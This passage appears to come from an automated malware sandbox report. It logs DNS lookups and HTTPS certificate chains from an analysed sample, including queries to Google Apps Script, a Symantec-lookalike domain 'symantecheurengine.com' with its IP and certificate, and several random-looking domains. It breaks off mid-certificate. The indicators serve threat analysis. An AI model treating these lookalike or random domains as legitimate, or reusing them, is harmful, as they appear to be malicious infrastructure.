Nov 21, 2017 13:09:48.532721996 MEZ8.8.8.8192.168.0.500xc5bcNo error (0)script.google.com216.58.198.206A (IP address)IN (0x0001)
Nov 21, 2017 13:09:51.582664967 MEZ8.8.8.8192.168.0.500xd9f6No error (0)script.googleusercontent.com28IN (0x0001)
Nov 21, 2017 13:09:51.600219965 MEZ8.8.8.8192.168.0.500x4e0dNo error (0)script.googleusercontent.com216.58.198.193A (IP address)IN (0x0001)
Nov 21, 2017 13:09:54.988450050 MEZ8.8.8.8192.168.0.500x1d80Name error (3)symantecheurengine.comnonenone28IN (0x0001)
Nov 21, 2017 13:09:55.004429102 MEZ8.8.8.8192.168.0.500xdc00No error (0)symantecheurengine.com66.70.246.5A (IP address)IN (0x0001)
Nov 21, 2017 13:09:55.422828913 MEZ8.8.8.8192.168.0.500xdc00No error (0)symantecheurengine.com66.70.246.5A (IP address)IN (0x0001)
Nov 21, 2017 13:09:55.509746075 MEZ8.8.8.8192.168.0.500x1d80Name error (3)symantecheurengine.comnonenone28IN (0x0001)
Nov 21, 2017 13:10:08.731468916 MEZ8.8.8.8192.168.0.500x7138Name error (3)symheureng.comnonenoneA (IP address)IN (0x0001)
Nov 21, 2017 13:10:09.656622887 MEZ8.8.8.8192.168.0.500xd392Name error (3)symeher.cononenoneA (IP address)IN (0x0001)
Nov 21, 2017 13:10:10.619075060 MEZ8.8.8.8192.168.0.500xfd4eName error (3)kio2349329490jfdkf394.comnonenoneA (IP address)IN (0x0001)
Nov 21, 2017 13:10:12.719142914 MEZ8.8.8.8192.168.0.500x26deName error (3)klsadkla93242lokiloki.comnonenoneA (IP address)IN (0x0001)
Nov 21, 2017 13:10:12.734967947 MEZ8.8.8.8192.168.0.500x26deName error (3)klsadkla93242lokiloki.comnonenoneA (IP address)IN (0x0001)
Nov 21, 2017 13:10:15.481964111 MEZ8.8.8.8192.168.0.500x909dName error (3)abrahamlincolnisaliveandrunssymantec.comnonenoneA (IP address)IN (0x0001)
Nov 21, 2017 13:10:15.498336077 MEZ8.8.8.8192.168.0.500x909dName error (3)abrahamlincolnisaliveandrunssymantec.comnonenoneA (IP address)IN (0x0001)

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Nov 21, 2017 13:09:50.523032904 MEZ44349201216.58.198.206192.168.0.50CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=USCN=Google Internet Authority G2, O=Google Inc, C=USWed Nov 01 14:42:45 CET 2017Wed Jan 24 14:30:00 CET 2018[[ Version: V3 Subject: CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun EC public key, 256 bits public x coord: 104269168710628015453318432232546336823796241387145082773726455127204368143587 public y coord: 110763727065057276622912180946195227288706395122634916245753456465670760921573 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Wed Nov 01 14:42:45 CET 2017, To: Wed Jan 24 14:30:00 CET 2018] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 1288f1af f0414eaa]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.google.com DNSName: *.android.com DNSName: *.appengine.google.com DNSName: *.cloud.google.com DNSName: *.db833953.google.cn DNSName: *.g.co DNSName: *.gcp.gvt2.com DNSName: *.google-analytics.com DNSName: *.google.ca DNSName: *.google.cl DNSName: *.google.co.in DNSName: *.google.co.jp DNSName: *.google.co.uk DNSName: *.google.com.ar DNSName: *.google.com.au DNSName: *.google.com.br DNSName: *.google.com.co DNSName: *.google.com.mx DNSName: *.google.com.tr DNSName: *.google.com.vn DNSName: *.google.de DNSName: *.google.es DNSName: *.google.fr DNSName: *.google.hu DNSName: *.google.it DNSName: *.google.nl DNSName: *.google.pl DNSName: *.google.pt DNSName: *.googleadapis.com DNSName: *.googleapis.cn DNSName: *.googlecommerce.com DNSName: *.googlevideo.com DNSName: *.gstatic.cn DNSName: *.gstatic.com DNSName: *.gvt1.com DNSName: *.gvt2.com DNSName: *.metric.gstatic.com DNSName: *.urchin.com DNSName: *.url.google.com DNSName: *.youtube-nocookie.com DNSName: *.youtube.com DNSName: *.youtubeeducation.com DNSName: *.yt.be DNSName: *.ytimg.com DNSName: android.clients.google.com DNSName: android.com DNSName: developer.android.google.cn DNSName: developers.android.google.cn DNSName: g.co DNSName: goo.gl DNSName: google-analytics.com DNSName: google.com DNSName: googlecommerce.com DNSName: source.android.google.cn DNSName: urchin.com DNSName: www.goo.gl DNSName: youtu.be DNSName: youtube.com DNSName: youtubeeducation.com DNSName: yt.be][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: F1 D6 24 EB E5 43 52 00 D2 DF 01 51 EA 20 AF 62 ..$..CR....Q. .b0010: 59 0A 51 64 Y.Qd]]] Algorithm: [SHA256withRSA] Signature:0000: 9B DF 4A B3 9D 53 1E 69 F6 45 69 37 2A 8D 7B E8 ..J..S.i.Ei7*...0010: 73 75 2D 46 61 FA E6 EE CC E0 81 F2 59 CB 40 22 su-Fa.......Y.@"0020: 21 02 23 3A 66 83 A5 5F FE C9 C3 A4 58 19 82 3C !.#:f.._....X..<0030: A0 AF 62 27 5A B0 2A 79 23 3D D7 CC 74 53 AD 9D ..b'Z.*y#=..tS..0040: DF 22 32 40 D2 CE 6A 3F 98 FA 2D 0C 53 DF F0 9B ."2@..j?..-.S...0050: 83 D3 58 F1 80 00 E3 66 E1 8D F4 DF EA F1 09 F0 ..X....f........0060: 6F 41 04 86 CA B7 8C 54 E0 14 38 DE 9F 4B 8C 95 oA.....T..8..K..0070: 15 5D 69 E1 B4 B0 4A 22 C4 D6 81 68 AA BA 1E B3 .]i...J"...h....0080: BB 57 C3 52 4F D3 CC 46 20 B3 3D BF 73 ED 8B 97 .W.RO..F .=.s...0090: 4A 66 B4 1F 4A A6 90 F2 A1 03 0E DC 74 16 F8 B0 Jf..J.......t...00A0: B2 2D 9F DF CA A5 BE D2 B0 0A 38 A1 B6 B0 1A E0 .-........8.....00B0: 8D D0 1D 80 59 C8 F4 0E A9 AE C2 EA EF DE 82 F6 ....Y...........00C0: 81 60 0A 58 59 E9 D6 E8 BE B9 E3 4E CB 66 F4 DF .`.XY......N.f..00D0: 2A 75 CF D4 81 D0 FF 7A 06 89 16 F5 CB 46 8F 51 *u.....z.....F.Q00E0: F3 78 07 9E 5F 10 E7 18 7B 5C B7 E4 A7 CA 4C 2B .x.._....\....L+00F0: 0D 97 21 B4 38 D1 8F E3 22 A2 76 17 A7 73 E6 58 ..!.8...".v..s.X]
Nov 21, 2017 13:09:50.523032904 MEZ44349201216.58.198.206192.168.0.50CN=Google Internet Authority G2, O=Google Inc, C=USCN=GeoTrust Global CA, O=GeoTrust Inc., C=USMon May 22 13:32:37 CEST 2017Tue Jan 01 00:59:59 CET 2019[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Mon May 22 13:32:37 CEST 2017, To: Tue Jan 01 00:59:59 CET 2019] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 01002125 88b0fa59 a777ef05 7b6627df]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: CA 49 E5 AC D7 64 64 77 5B BE 71 FA CF F4 1E 23 .I...ddw[.q....#0010: C7 9A 69 63 54 5F EB 4C D6 19 28 23 64 66 8E 1C ..icT_.L..(#df..0020: C7 87 80 64 5F 04 8B 26 AF 98 DF 0A 70 BC BC 19 ...d_..&....p...0030: 3D EE 7B 33 A9 7F BD F4 05 D4 70 BB 05 26 79 EA =..3......p..&y.0040: 9A C7 98 B9 07 19 65 34 CC 3C E9 3F C5 01 FA 6F ......e4.<.?...o0050: 0C 7E DB 7A 70 5C 4C FE 2D 00 F0 CA BE 2D 8E B4 ...zp\L.-....-..0060: A8 80 FB 01 13 88 CB 9C 3F E5 BB 77 CA 3A 67 36 ........?..w.:g60070: F3 CE D5 27 02 72 43 A0 BD 6E 02 F1 47 05 71 3E ...'.rC..n..G.q>0080: 01 59 E9 11 9E 1A F3 84 0F 80 A6 A2 78 35 2F B6 .Y..........x5/.0090: C7 A2 7F 17 7C E1 8B 56 AE EE 67 88 51 27 30 60 .......V..g.Q'0`00A0: A5 62 52 C3 37 D5 3B EA 85 2A 01 38 87 A2 CF 70 .bR.7.;..*.8...p00B0: AD A4 7A C9 C4 E7 CA C5 DA BC 23 32 F2 FE 18 C2 ..z.......#2....00C0: 7B E0 DF 3B 2F D4 D0 10 E6 96 4C FB 44 B7 21 64 ...;/.....L.D.!d00D0: 0D B9 00 94 30 12 26 87 58 98 39 05 38 0F CC 82 ....0.&.X.9.8...00E0: 48 0C 0A 47 66 EE BF B4 5F C4 FF 70 A8 E1 7F 8B H..Gf..._..p....00F0: 79 2B B8 65 32 A3 B9 B7 31 E9 0A F5 F6 1F 32 DC y+.e2...1.....2.]
Nov 21, 2017 13:09:50.523032904 MEZ44349201216.58.198.206192.168.0.50CN=GeoTrust Global CA, O=GeoTrust Inc., C=USOU=Equifax Secure Certificate Authority, O=Equifax, C=USTue May 21 06:00:00 CEST 2002Tue Aug 21 06:00:00 CEST 2018[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Nov 21, 2017 13:09:52.548022032 MEZ44349202216.58.198.193192.168.0.50CN=*.googleusercontent.com, O=Google Inc, L=Mountain View, ST=California, C=USCN=Google Internet Authority G2, O=Google Inc, C=USWed Nov 01 14:30:00 CET 2017Wed Jan 24 14:30:00 CET 2018[[ Version: V3 Subject: CN=*.googleusercontent.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun EC public key, 256 bits public x coord: 1369368470866655806909080740712736427311866252202912388709536706796876738480 public y coord: 36209825946646895685460983430856565548933992013720753722056896315861260728433 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Wed Nov 01 14:30:00 CET 2017, To: Wed Jan 24 14:30:00 CET 2018] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 79f64450 6d03c5dc]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.googleusercontent.com DNSName: *.apps.googleusercontent.com DNSName: *.appspot.com.storage.googleapis.com DNSName: *.blogspot.com DNSName: *.bp.blogspot.com DNSName: *.commondatastorage.googleapis.com DNSName: *.content-storage-download.googleapis.com DNSName: *.content-storage-upload.googleapis.com DNSName: *.content-storage.googleapis.com DNSName: *.doubleclickusercontent.com DNSName: *.ggpht.com DNSName: *.googledrive.com DNSName: *.googlesyndication.com DNSName: *.googleweblight.com DNSName: *.safenup.googleusercontent.com DNSName: *.sandbox.googleusercontent.com DNSName: *.storage-download.googleapis.com DNSName: *.storage-upload.googleapis.com DNSName: *.storage.googleapis.com DNSName: *.storage.select.googleapis.com DNSName: blogspot.com DNSName: bp.blogspot.com DNSName: commondatastorage.googleapis.com DNSName: doubleclickusercontent.com DNSName: ggpht.com DNSName: googledrive.com DNSName: googleusercontent.com DNSName: googleweblight.com DNSName: manifest.lh3.googleusercontent.com DNSName: static.panoramio.com.storage.googleapis.com DNSName: storage.googleapis.com DNSName: storage.select.googleapis.com DNSName: unfiltered.news][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: CD 87 60 88 EC BF 63 3C 24 00 95 38 66 B4 0E 86 ..`...c<$..8f...0010: 41 33 9A 94 A3..]]] Algorithm: [SHA256withRSA] Signature:0000: 27 02 EA E2 09 7F 02 BB D5 BE 60 BC 0C 35 EF 7F '.........`..5..0010: ED D8 21 28 25 06 46 F4 5A 44 8C F5 0B 72 2C 38 ..!(%.F.ZD...r,80020: 9C 64 3E C0 AF F3 F2 75 E5 0C B8 BB B9 3F 13 B7 .d>....u.....?..0030: 81 DF CE AC 49 BB 60 4C 86 77 59 AC 9B 51 2F 71 ....I.`L.wY..Q/q0040: 37 6F 4A B8 42 A0 84 11 3D 20 B9 5E 61 4E B5 AB 7oJ.B...= .^aN..0050: ED 6F D1 59 96 E4 1D E5 9D F1 C9 FF 42 5E 1F B8 .o.Y........B^..0060: 92 21 B1 FF 24 52 BB B7 49 75 AF 4D CF A5 9D F7 .!..$R..Iu.M....0070: BB 40 1A 61 1B 7C D9 27 8E E6 67 C7 BA 08 5C 59 .@.a...'..g...\Y0080: 7E 18 50 69 D1 41 7E F5 45 28 DD 61 7A 60 46 2D ..Pi.A..E(.az`F-0090: 99 21 77 1C 00 E4 0B EB D6 6C 11 1B 51 9F 28 C4 .!w......l..Q.(.00A0: D3 34 3E 91 99 A3 BE 18 8D 43 62 91 A6 A8 4D C0 .4>......Cb...M.00B0: 83 A8 5A 23 9A 06 52 63 B0 D7 5B A3 30 65 4E 5F ..Z#..Rc..[.0eN_00C0: A8 3B 32 FF 1D 39 F1 0F CA A7 B5 8E BD 9B 83 4A .;2..9.........J00D0: 0A 57 7A 2A 77 4E BA 85 95 66 B5 13 A0 30 72 E2 .Wz*wN...f...0r.00E0: 1A 30 BE 6E 81 C4 25 5C 80 7F 9A 54 D6 8F FA 8F .0.n..%\...T....00F0: 47 8F D9 94 5D E5 6E 0E EB 12 41 F4 F2 0C 52 9F G...].n...A...R.]
Nov 21, 2017 13:09:52.548022032 MEZ44349202216.58.198.193192.168.0.50CN=Google Internet Authority G2, O=Google Inc, C=USCN=GeoTrust Global CA, O=GeoTrust Inc., C=USMon May 22 13:32:37 CEST 2017Tue Jan 01 00:59:59 CET 2019[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Mon May 22 13:32:37 CEST 2017, To: Tue Jan 01 00:59:59 CET 2019] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 01002125 88b0fa59 a777ef05 7b6627df]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: CA 49 E5 AC D7 64 64 77 5B BE 71 FA CF F4 1E 23 .I...ddw[.q....#0010: C7 9A 69 63 54 5F EB 4C D6 19 28 23 64 66 8E 1C ..icT_.L..(#df..0020: C7 87 80 64 5F 04 8B 26 AF 98 DF 0A 70 BC BC 19 ...d_..&....p...0030: 3D EE 7B 33 A9 7F BD F4 05 D4 70 BB 05 26 79 EA =..3......p..&y.0040: 9A C7 98 B9 07 19 65 34 CC 3C E9 3F C5 01 FA 6F ......e4.<.?...o0050: 0C 7E DB 7A 70 5C 4C FE 2D 00 F0 CA BE 2D 8E B4 ...zp\L.-....-..0060: A8 80 FB 01 13 88 CB 9C 3F E5 BB 77 CA 3A 67 36 ........?..w.:g60070: F3 CE D5 27 02 72 43 A0 BD 6E 02 F1 47 05 71 3E ...'.rC..n..G.q>0080: 01 59 E9 11 9E 1A F3 84 0F 80 A6 A2 78 35 2F B6 .Y..........x5/.0090: C7 A2 7F 17 7C E1 8B 56 AE EE 67 88 51 27 30 60 .......V..g.Q'0`00A0: A5 62 52 C3 37 D5 3B EA 85 2A 01 38 87 A2 CF 70 .bR.7.;..*.8...p00B0: AD A4 7A C9 C4 E7 CA C5 DA BC 23 32 F2 FE 18 C2 ..z.......#2....00C0: 7B E0 DF 3B 2F D4 D0 10 E6 96 4C FB 44 B7 21 64 ...;/.....L.D.!d00D0: 0D B9 00 94 30 12 26 87 58 98 39 05 38 0F CC 82 ....0.&.X.9.8...00E0: 48 0C 0A 47 66 EE BF B4 5F C4 FF 70 A8 E1 7F 8B H..Gf..._..p....00F0: 79 2B B8 65 32 A3 B9 B7 31 E9 0A F5 F6 1F 32 DC y+.e2...1.....2.]
Nov 21, 2017 13:09:52.548022032 MEZ44349202216.58.198.193192.168.0.50CN=GeoTrust Global CA, O=GeoTrust Inc., C=USOU=Equifax Secure Certificate Authority, O=Equifax, C=USTue May 21 06:00:00 CEST 2002Tue Aug 21 06:00:00 CEST 2018[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Nov 21, 2017 13:09:56.656483889 MEZ4434920366.70.246.5192.168.0.50CN=symantecheurengine.comCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USFri Nov 17 01:00:00 CET 2017Fri Feb 16 00:59:59 CET 2018[[ Version: V3 Subject: CN=symantecheurengine.com Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 28209255534154915782363840468736285163336289005224434306009140233215832511465302693225125441750303036190635716548915391447759457086187091985651378063012446603408043445383420406669378894865881219560279473727857923720512618428355091264773519882315319270088240817696161485551998634288492963237293908332214964246091311346242399957447275587199868043491948177221628047409630387200172488961951464980216932800793244247739937627654165010430880231103444433453549498414643830741210603776270626233720732791417815388313355376872006510205331659445087636633023934346371459540186834647862654942623654491869372967498799916721803943461 public exponent: 65537 Validity: [From: Fri Nov 17 01:00:00 CET 2017, To: Fri Feb 16 00:59:59 CET 2018] Issuer: CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US SerialNumber: [ 0708861f cd5028f0 1a754064 f7c702b5]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/cPanelIncCertificationAuthority.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 7E 03 5A 65 41 6B A7 7E 0A E1 B8 9D 08 EA 1D 8E ..ZeAk..........0010: 1D 6A C7 65 .j.e]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: 